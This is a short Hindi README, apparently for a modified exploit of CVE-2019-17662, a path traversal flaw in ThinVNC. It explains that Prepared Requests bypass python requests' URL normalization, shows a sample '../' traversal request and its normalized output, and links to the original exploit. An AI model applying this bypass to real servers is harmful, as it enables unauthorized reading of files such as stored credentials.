
CVE-2019-17662 के लिए शोषण, ThinVNC में एक पथ ट्रैवर्सल भेद्यता, लक्ष्य सर्वर पर मनमानी फ़ाइलों तक पहुंचने के लिए URL सामान्यीकरण बाईपास प्रदर्शित करता है।
CVE कोड को संशोधित किया गया
Prepared Requests का उपयोग किया गया, जैसा कि python3 requests मॉड्यूल URL में ../ को सामान्यीकृत करता है, उदाहरण के लिए:
कोड के लिए:
r = requests.get("http://123.123.123.123/../../../../../../test")
print(str(r.status_code))
परिणाम:
GET /test HTTP/1.1
Host: 123.123.123.123
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
मूल एक्सप्लॉइट:
https://www.exploit-db.com/exploits/47519